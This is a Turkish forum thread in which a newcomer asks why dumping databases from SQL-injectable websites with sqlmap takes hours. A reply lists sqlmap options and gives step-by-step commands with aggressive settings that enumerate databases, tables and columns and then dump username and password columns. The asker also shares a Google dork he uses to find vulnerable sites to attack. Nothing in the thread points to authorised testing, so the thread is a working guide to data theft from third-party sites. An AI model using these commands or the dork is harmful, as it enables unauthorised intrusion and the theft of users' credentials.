Sqlmap İle Data Çekmek Ne Kadar Sürer ?

Teadorx · 15 Ara 2023

Dostlar ben sql açıklı bir sitenin database'si ni çekerken bu işlem saatlerce sürebiliyor bu normal mi, değil ise ne kadar sürmesi gerekiyor
Yardım ederseniz çok mutlu olurum şimdiden teşekkür ederim

I AM EAC0D3Rx · 15 Ara 2023

alıntıdır.

[/COLOR]
--risk : 1 ile 3 arasında değerler alabilen parametremiz. Eğer belirtilmezse default olarak 1 değerini alır. Risk 1 daha sınırlı sql cümleleri ile denetleme yapar. Risk 2'de risk 1'in üzerine heavy-query time based saldırılar da denetlemeye tabii tutulur. Risk 3'te ise ekstradan Or-based testler de eklenir.


--level : 1 ile 5 arasında değerler alabilen parametremiz. 1. seviyede daha kısıtlı testler denetlenirken, 5.seviyede daha fazla payload, daha detaylı prefix ve suffixler ile zenginleştirilmiş payloadlar kullanılmaktadır. Ayrıca HTTP Cookie başlığı 2.seviyeden sonra ve HTTP User-Agent/Referer başlıkları da seviye 3'ten sonra denetlenmektedir.


--random-agent : Testlerimizde kullanacağımı User-Agent değerinin, sqlmap ile hazır gelen user-agent değerlerinin bulunduğu dosya içeriisnden random olarak atanması için kullanabileceğimiz parametremiz.

--user-agent : Testlerimizde kullanacağımız User-Agent değerini kendimiz belirlemek için kullanabileceğimiz komutumuz.

-v : Default olarak 1 tanımlı gelen ve sqlmap çalıştığı süre zarfında bize gösterdiği çıktıların gösterimini belirlediğimiz verbose komutumuz. 0 ile 6 arasında değişmekte. 0 en az çıktıyı döndürürken, 6 en çok çıktı ile sonuçları döndürmekte.

--batch : Sqlmap'in input gerektiren bazı durumlarında, kullanıcı inputunu istemeden, sqlmap tarafından tanımlı default değerlere göre devam etmesini sağlayan parametremiz

--threads : Multi-threading ile sqlmap'in maximum kaç tane HTTP(s) isteği yapabileceğini belirlemek için kullanabileceğimiz parametremiz. Özellikle bruteforce searching işlemlerinde, aramamızı oldukça hızlandıran bu yöntem, performans sebepleri gerekçesiyle max. 10 thread kullanılması tavsiye edilmekte.



VERİTABANINI DAHA KOLAY ÇEKMEK İÇİN

1-)C:// Dizinine Gidelim...

KOD:
cd..
cd..

2-) C:// Dizininde SQLMAP'i Çalıştıralım...
KOD: cd sqlmap

3-)Veritabanını Çekelim...
KOD: sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

4-)Tabloları Çekelim...
KOD: sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 veritabanıadı --tables

5-)Kolonları Çekelim...
KOD: sqlmap.py -u "siteadresi.com/news.php?id=x"* --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D veritabanıadı -T tabloadı --columns

6-)Verileri Çekelim...
KOD: sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D veritabanıadı -T tabloadı -C kullanıcıadı,şifre --dump
[COLOR=rgb(97, 189, 109)]

Teadorx · 15 Ara 2023

404Qea' Alıntı:
alıntıdır.
[/COLOR] --risk : 1 ile 3 arasında değerler alabilen parametremiz. Eğer belirtilmezse default olarak 1 değerini alır. Risk 1 daha sınırlı sql cümleleri ile denetleme yapar. Risk 2'de risk 1'in üzerine heavy-query time based saldırılar da denetlemeye tabii tutulur. Risk 3'te ise ekstradan Or-based testler de eklenir. --level : 1 ile 5 arasında değerler alabilen parametremiz. 1. seviyede daha kısıtlı testler denetlenirken, 5.seviyede daha fazla payload, daha detaylı prefix ve suffixler ile zenginleştirilmiş payloadlar kullanılmaktadır. Ayrıca HTTP Cookie başlığı 2.seviyeden sonra ve HTTP User-Agent/Referer başlıkları da seviye 3'ten sonra denetlenmektedir. --random-agent : Testlerimizde kullanacağımı User-Agent değerinin, sqlmap ile hazır gelen user-agent değerlerinin bulunduğu dosya içeriisnden random olarak atanması için kullanabileceğimiz parametremiz. --user-agent : Testlerimizde kullanacağımız User-Agent değerini kendimiz belirlemek için kullanabileceğimiz komutumuz. -v : Default olarak 1 tanımlı gelen ve sqlmap çalıştığı süre zarfında bize gösterdiği çıktıların gösterimini belirlediğimiz verbose komutumuz. 0 ile 6 arasında değişmekte. 0 en az çıktıyı döndürürken, 6 en çok çıktı ile sonuçları döndürmekte. --batch : Sqlmap'in input gerektiren bazı durumlarında, kullanıcı inputunu istemeden, sqlmap tarafından tanımlı default değerlere göre devam etmesini sağlayan parametremiz --threads : Multi-threading ile sqlmap'in maximum kaç tane HTTP(s) isteği yapabileceğini belirlemek için kullanabileceğimiz parametremiz. Özellikle bruteforce searching işlemlerinde, aramamızı oldukça hızlandıran bu yöntem, performans sebepleri gerekçesiyle max. 10 thread kullanılması tavsiye edilmekte. VERİTABANINI DAHA KOLAY ÇEKMEK İÇİN 1-)C:// Dizinine Gidelim... KOD: cd.. cd.. 2-) C:// Dizininde SQLMAP'i Çalıştıralım... KOD: cd sqlmap 3-)Veritabanını Çekelim... KOD: sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs 4-)Tabloları Çekelim... KOD: sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 veritabanıadı --tables 5-)Kolonları Çekelim... KOD: sqlmap.py -u "siteadresi.com/news.php?id=x"* --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D veritabanıadı -T tabloadı --columns 6-)Verileri Çekelim... KOD: sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D veritabanıadı -T tabloadı -C kullanıcıadı,şifre --dump [COLOR=rgb(97, 189, 109)]

Dbs i çekerken başına sadece python2 yazıyorum tek fark o
Problem ordan mi kaynaklanıyor acaba

I AM EAC0D3Rx · 15 Ara 2023

Teadorx' Alıntı:
Dbs i çekerken başına sadece python2 yazıyorum tek fark o
Problem ordan mi kaynaklanıyor acaba

işlemlerinizi sqlmap üzerinden yapmıyor musunuz?

Teadorx · 15 Ara 2023

404Qea' Alıntı:
işlemlerinizi sqlmap üzerinden yapmıyor musunuz?

Evet sqlmap üzerinden kullandığım kod bu : python2 sqlmap.py -u "hedef site" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

I AM EAC0D3Rx · 15 Ara 2023

Teadorx' Alıntı:
Evet sqlmap üzerinden kullandığım kod bu : python2 sqlmap.py -u "hedef site" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

bana telegram üzerinden yazar mısınız? post kasmayalım burada.

Teadorx · 15 Ara 2023

404Qea' Alıntı:
bana telegram üzerinden yazar mısınız? post kasmayalım burada.

Tabi olur isminiz nedir

lebra · 15 Ara 2023

Teadorx' Alıntı:
Dbs i çekerken başına sadece python2 yazıyorum tek fark o
Problem ordan mi kaynaklanıyor acaba

benım bıldıgım kalı lınux sanal makınesınden sqlmap -h yapıp bılgı alabılırsınız ayrıca genellıkle --random-agent --dbs yazılır ve ılk tarama boyle yapılır

Teadorx · 15 Ara 2023

lebra' Alıntı:
benım bıldıgım kalı lınux sanal makınesınden sqlmap -h yapıp bılgı alabılırsınız ayrıca genellıkle --random-agent --dbs yazılır ve ılk tarama boyle yapılır

Ben termux ile yapıyorum onun için de geçerlimidir

Grimner · 16 Ara 2023

Teadorx' Alıntı:
Dostlar ben sql açıklı bir sitenin database'si ni çekerken bu işlem saatlerce sürebiliyor bu normal mi, değil ise ne kadar sürmesi gerekiyor

Net bir süre vermek mümkün değil. Burada ki durum internet hızına göre ve siteye bağlı etmenlere göre değişebilir.

Teadorx · 16 Ara 2023

Grimner' Alıntı:
Net bir süre vermek mümkün değil. Burada ki durum internet hızına göre ve siteye bağlı etmenlere göre değişebilir.

Bu işte yeniyim özür diliyerek soruyorum bunun minimum süresi vs yokmu çünkü 4 saatten aşağı sürmüyor
İkinci maruzatım şu dorkla bir alakası olabilir mi
inurl

hp?id= intext:”you have an error in your sql syntax” site: kullandığım dork bu özellikle bu dork ile bulduğum sitelerin dbs ini çekerken saatlerce bekliyorum çoğu zaman sıkılıp kapatıyorum

Grimner · 16 Ara 2023

Teadorx' Alıntı:
inurlhp?id= intext:”you have an error in your sql syntax” site: kullandığım dork bu özellikle bu dork ile bulduğum sitelerin dbs ini çekerken saatlerce bekliyorum çoğu zaman sıkılıp kapatıyorum

Sqlmap konusunda uzman olmadığımdan net bir şey diyemem ancak

--risk=3 --level=5

tarzı parametrelerin kullanımından dolayı olduğunu düşünüyorum. Bunlar daha çeşitli yöntemler denediğinden normalden de uzun sürüyor olması lazım.

Teadorx · 16 Ara 2023

Grimner' Alıntı:
Sqlmap konusunda uzman olmadığımdan net bir şey diyemem ancak

tarzı parametrelerin kullanımından dolayı olduğunu düşünüyorum. Bunlar daha çeşitli yöntemler denediğinden normalden de uzun sürüyor olması lazım.

Cevaplarınız için teşekkür ederim bana çok yardımcı oldunuz

Sqlmap İle Data Çekmek Ne Kadar Sürer ?

Teadorx

Yeni üye

I AM EAC0D3Rx

Uzman üye

Teadorx

Yeni üye

I AM EAC0D3Rx

Uzman üye

Teadorx

Yeni üye

I AM EAC0D3Rx

Uzman üye

Teadorx

Yeni üye

lebra

Yeni üye

Teadorx

Yeni üye

Grimner

Adanmış Üye

Teadorx

Yeni üye

Grimner

Adanmış Üye

Teadorx

Yeni üye

Sosyal medya sayfalarımız